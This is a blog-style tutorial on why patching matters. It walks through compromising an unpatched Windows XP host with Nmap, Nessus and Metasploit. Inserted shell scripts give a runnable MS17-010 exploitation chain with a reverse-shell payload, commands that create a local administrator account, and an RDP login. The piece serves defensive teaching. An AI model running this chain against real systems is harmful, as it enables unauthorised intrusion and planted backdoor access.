The importance of security patching cannot be overstated: it is a fundamental practice that protects the integrity, confidentiality and availability of systems. Despite that, patching is often neglected, leaving vulnerabilities that malicious actors can exploit with very little effort. In this article I will show how trivial it is to compromise an unpatched machine with readily available tools and limited skill. The whole process takes less than five minutes.

All we need here is Nmap and Metasploit, both of which ship with Kali Linux (other distributions are available), and Nessus, which has a free edition (Nessus Essentials, limited to 16 IP addresses) that is more than enough for this demonstration.

The (TL;DR) executive summary

Some of the exploitation steps in this demonstration get a bit technical. At a high level, this is all it takes to get from an unpatched system to full access:

  • Scan the network (no account on the target needed)
  • Scan for vulnerabilities (no account on the target needed)
  • Run the readily available exploit (no account on the target needed)
  • Get access to everything

If you would like to make sure this does not happen to you, contact me via YDC for advice, assessment, and testing.

Why security patching is important

Patching is the process of updating software to fix vulnerabilities, improve functionality and keep it compatible with other software. Vendors release patches in response to identified security flaws or bugs that attackers could exploit. The main reasons security patching matters are:

    • Security: Patches close known vulnerabilities that could otherwise be exploited to gain unauthorised access, escalate privileges or execute malicious code. Once a patch is public, attackers can compare the patched and unpatched binaries to locate the flaw, so the window between release and exploitation is short.

    • Stability: Regular updates help ensure the system runs smoothly by fixing bugs and improving performance.

    • Compliance: Many regulatory frameworks require organisations to maintain up-to-date software to ensure the security of sensitive data.

    • Feature Enhancements: Updates often bundle new features and improvements alongside the fixes, enhancing the overall user experience.

The risks of not patching

The failure to apply patches in a timely manner can lead to severe consequences, including:

    • Exploitation of Vulnerabilities: Unpatched systems are prime targets for attackers who exploit known vulnerabilities to infiltrate networks, steal data, or deploy malware.

    • Data Breaches: Sensitive information can be exposed, leading to financial losses, reputational damage, and legal repercussions.

    • System Downtime: Security incidents resulting from unpatched vulnerabilities can cause significant disruptions to operations.

    • Incompatibility Issues: Outdated software may not work well with newer applications or systems, leading to functionality issues.

Demonstrating the ease of exploitation

To illustrate the risks associated with not patching, I will demonstrate how easily an outdated and unpatched operating system can be compromised. This demonstration involves three tools: Nmap, Nessus and Metasploit, all of which are free (or have a free edition), readily available and easy to use.

Step 1: Identifying the operating system with Nmap

Nmap (Network Mapper) is a powerful tool used for network discovery and security auditing. By performing an Nmap OS detection scan, we can identify the operating system of a target machine.

To make the example more realistic I did a host discovery scan of the subnet first to find active hosts, copied that list into a text file, then ran an OS detection scan against those hosts. The results tell us each target's operating system and version. They do not tell us whether it is patched; that is what the vulnerability scan in the next step is for.

And there we go: the host ending in .140 is a Windows XP machine. Oops.
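Here is the two-stage sweep from this step as an added shell example (my code, not the article's own commands or output): a host discovery pass whose live hosts are written to a text file, an OS detection pass over that file, and an awk parser over Nmap's greppable output that flags any host whose fingerprint matches a pattern, Windows XP by default. The 192.168.1.0/24 subnet, the file names and the sample scan output are assumptions; the sample is constructed so the parser can be exercised without a network.

```shell
#!/usr/bin/env bash
# Added example: two-stage Nmap sweep, then a parser that flags hosts whose OS
# fingerprint matches a pattern. The subnet, file names and sample output below
# are assumptions, not values from the article.
set -u

# Stage 1: host discovery only (-sn), greppable output to stdout, keep hosts "Up".
# Stage 2: OS detection (-O) against that list; greppable output to a file.
# Raw-socket scans need root, hence sudo.
discover_and_fingerprint() {
    local subnet="$1" hosts_file="${2:-hosts.txt}" out="${3:-os-scan.gnmap}"
    sudo nmap -sn -oG - "$subnet" | awk '/Status: Up$/ { print $2 }' > "$hosts_file"
    sudo nmap -O --osscan-guess -iL "$hosts_file" -oG "$out"
}

# Greppable output is one tab-separated line per host; when -O produced a match
# the line carries an "OS: <name>" field. Print "ip<TAB>os" for hosts matching
# PATTERN (default "Windows XP"). A host with no OS field is skipped.
flag_os() {
    local file="$1" pattern="${2:-Windows XP}"
    awk -F'\t' -v pat="$pattern" '
        /^Host:/ {
            ip = $1; sub(/^Host: /, "", ip); sub(/ .*/, "", ip)
            for (i = 1; i <= NF; i++)
                if ($i ~ ("^OS: .*" pat)) { os = $i; sub(/^OS: /, "", os); print ip "\t" os }
        }' "$file"
}

# Constructed sample of -oG output (not real scan results) so flag_os can run offline.
write_sample_gnmap() {
    {
        printf '# Nmap 7.94 scan initiated (constructed sample)\n'
        printf 'Host: 192.168.1.1 ()\t%s\t%s\t%s\n' \
            'Ports: 22/open/tcp//ssh///, 80/open/tcp//http///' \
            'OS: Linux 5.4 - 5.10' 'Seq Index: 260'
        printf 'Host: 192.168.1.140 ()\t%s\t%s\t%s\t%s\n' \
            'Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///' \
            'Ignored State: closed (996)' 'OS: Microsoft Windows XP SP3' 'Seq Index: 258'
        printf 'Host: 192.168.1.150 ()\t%s\t%s\n' \
            'Ports: 445/open/tcp//microsoft-ds///' 'Seq Index: 259'
        printf '# Nmap done (constructed sample)\n'
    } > "$1"
}

# Against a live network (needs nmap and root):
#   discover_and_fingerprint 192.168.1.0/24 && flag_os os-scan.gnmap
# Offline run on the constructed sample:
if [ "${1:-}" = "--demo" ]; then
    write_sample_gnmap /tmp/os-scan.gnmap
    flag_os /tmp/os-scan.gnmap
fi
```

Run it with --demo to watch the parser pick the .140 host out of the constructed sample; against a real network call discover_and_fingerprint with your own subnet. An OS guess is only a guess (the host with no OS field is the usual outcome for anything behind a firewall), so treat it as a lead for the vulnerability scan in the next step rather than a conclusion.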

Step 2: Identifying vulnerabilities with Nessus

Windows XP is a bit of a dumpster fire these days (it has been out of support since April 2014), but pretend we do not already know it has more holes in it than grandma's crochet. Nessus is a vulnerability scanner that identifies security weaknesses in systems. By running a Nessus scan against the target machine, we can enumerate the specific vulnerabilities that need patching.

1. Launch Nessus and create a new scan.

2. Enter the target IP address and configure the scan settings.

3. Execute the scan and review the results.

The scan results will highlight critical vulnerabilities, providing detailed information about each, including CVE identifiers, severity levels, and remediation steps.

On this occasion we can drill in and find a missing patch: MS17-010, Security Update for Microsoft Windows SMB Server (4013389). Worth noting: Microsoft shipped this fix for Windows XP out of band in May 2017 (KB4012598) after WannaCry, so even an end-of-life XP box could have been patched against it.
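Before spending an exploit on a scanner finding it is worth a second opinion from a different tool. The following added example (my code, not the article's) runs Nmap's smb-vuln-ms17-010 script against TCP/445 and reduces its output to one verdict per host. The target address and the sample output are assumptions, and the sample is constructed so the parser can be exercised offline.

```shell
#!/usr/bin/env bash
# Added example: cross-check an MS17-010 finding with Nmap's smb-vuln-ms17-010
# script and parse the verdict per host. Target address and sample output are
# assumptions, not the article's own.
set -u

# vulns.showall=1 makes the vuln library report NOT VULNERABLE as well, instead
# of staying silent for hosts that pass. Normal output is saved for parsing.
check_ms17_010() {
    local target="$1" out="${2:-ms17-010.nmap}"
    nmap -Pn -p445 --script smb-vuln-ms17-010 --script-args vulns.showall=1 -oN "$out" "$target"
}

# Print "host<TAB>verdict". The verdict is the "State:" line inside the script's
# block. With no block at all (port closed, SMB negotiation failed, script error)
# the answer is UNKNOWN, deliberately distinct from NOT VULNERABLE.
parse_ms17_010() {
    awk '
        function flush() { if (host != "") print host "\t" state }
        /^Nmap scan report for/ { flush(); host = $NF; gsub(/[()]/, "", host); state = "UNKNOWN"; inblock = 0 }
        /smb-vuln-ms17-010:/ { inblock = 1 }
        inblock && /State:/ { state = $0; sub(/.*State: */, "", state) }
        END { flush() }
    ' "$1"
}

# Constructed sample of -oN output (not real scan results): one vulnerable host,
# one patched host, one with 445 closed.
write_sample_nse() {
    cat > "$1" <<'EOF'
# Nmap 7.94 scan initiated (constructed sample)
Nmap scan report for 192.168.1.140
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH

Nmap scan report for 192.168.1.150
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   NOT VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|_    State: NOT VULNERABLE

Nmap scan report for 192.168.1.160
Host is up (0.0030s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds

# Nmap done (constructed sample)
EOF
}

# Live use:  check_ms17_010 192.168.1.140 && parse_ms17_010 ms17-010.nmap
# Offline run on the constructed sample:
if [ "${1:-}" = "--demo" ]; then
    write_sample_nse /tmp/ms17-010.nmap
    parse_ms17_010 /tmp/ms17-010.nmap
fi
```

UNKNOWN is kept separate from NOT VULNERABLE on purpose: a closed port or a failed SMB negotiation leaves the question open, and an unpatched host that a firewall rule happens to hide from the scanner is still unpatched.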

Step 3: Exploiting vulnerabilities with Metasploit

Metasploit is a well-known penetration testing framework that allows security professionals (and bad guys!) to exploit vulnerabilities and demonstrate the potential impact of unpatched systems.

1. Launch Metasploit and search for an exploit that corresponds to one of the identified vulnerabilities.

2. The only part of this process that requires any talent is knowing that Windows XP does not have PowerShell, so we want the native module rather than one that relies on PowerShell on the target. Select that exploit module and configure the necessary options, including the target IP address.

We can then ask Metasploit's check command whether the target is likely to be vulnerable; it probes the host without launching the exploit:

3. Execute the exploit to gain a shell on the target machine.

If the exploit is successful, we will have gained unauthorised access to the unpatched system, demonstrating the ease with which attackers can compromise vulnerable machines.

We are on the system with SYSTEM privileges, which is sufficient to do whatever we like. Maybe create ourselves a user account and make it an admin:

Then we can RDP to the system and log in as our new user:
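The Metasploit part of the procedure (the three steps above plus the account creation and RDP login) as an added shell example, my code rather than the article's own session: a resource script for msfconsole that selects the module, runs check first and only then launches the exploit, followed by the post-exploitation commands. The module name (exploit/windows/smb/ms17_010_psexec, which to my knowledge covers Windows XP and 2003 among others and does not need PowerShell on the target), the addresses, the account name and the password are all assumptions.

```shell
#!/usr/bin/env bash
# Added example: drive the Metasploit step from a resource script, then the
# post-exploitation commands and the RDP login. Module choice, addresses, account
# name and password are assumptions, not values from the article.
set -u

# Emit a resource script for "msfconsole -r". "check" probes the host first; the
# exploit only runs afterwards. "exploit -z" backgrounds the session on success.
# A native staged Meterpreter payload keeps the no-PowerShell constraint satisfied.
make_ms17_010_rc() {
    local rhost="$1" lhost="$2" lport="${3:-4444}"
    cat <<EOF
use exploit/windows/smb/ms17_010_psexec
set RHOSTS $rhost
set LHOST $lhost
set LPORT $lport
set PAYLOAD windows/meterpreter/reverse_tcp
check
exploit -z
EOF
}

# Commands to run in the shell of the resulting session (meterpreter> shell).
# The session runs as SYSTEM, so creating a local administrator needs no further
# escalation. Remove the account when the engagement ends: net user <name> /delete
post_exploitation_cmds() {
    local user="$1" pass="$2"
    printf '%s\n' \
        "net user $user $pass /add" \
        "net localgroup administrators $user /add"
}

# End-to-end run. Needs msfconsole and xfreerdp on the attacking box; Remote
# Desktop is assumed to be already enabled on the target, as in the demonstration.
run_demo() {
    local rhost="$1" lhost="$2" user="$3" pass="$4"
    make_ms17_010_rc "$rhost" "$lhost" > /tmp/ms17_010.rc
    echo "Once in the session, type 'shell' and run:"
    post_exploitation_cmds "$user" "$pass"
    msfconsole -q -r /tmp/ms17_010.rc
    xfreerdp /v:"$rhost" /u:"$user" /p:"$pass" /cert:ignore
}

# Example invocation (assumed addresses and credentials):
#   run_demo 192.168.1.140 192.168.1.50 ydc 'Correct-Horse-7'
```

Putting check before exploit in the script is the point: a failed check costs nothing, whereas an MS17-010 exploit that is thrown at a host that is not vulnerable, or at the wrong build, can leave the target blue-screened. On a real engagement that is the difference between a finding and an outage.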

This process works on any Windows system with an unpatched vulnerability that permits remote code execution. Guess what happens if you do it on a domain controller? Yep… you get the ability to give yourself permission to anything in the domain, and it all takes a couple of minutes!

Patch, or pay the price

Patching is a key aspect of maintaining the security and functionality of systems. Neglecting it exposes organisations to significant risks, including exploitation of known vulnerabilities, data breaches and operational disruption. As we have seen, compromising an outdated and unpatched operating system is alarmingly straightforward with freely available tools like Nmap, Nessus and Metasploit. By treating security patching and updates as a priority, organisations can safeguard their assets and stay resilient in the face of evolving cyber threats.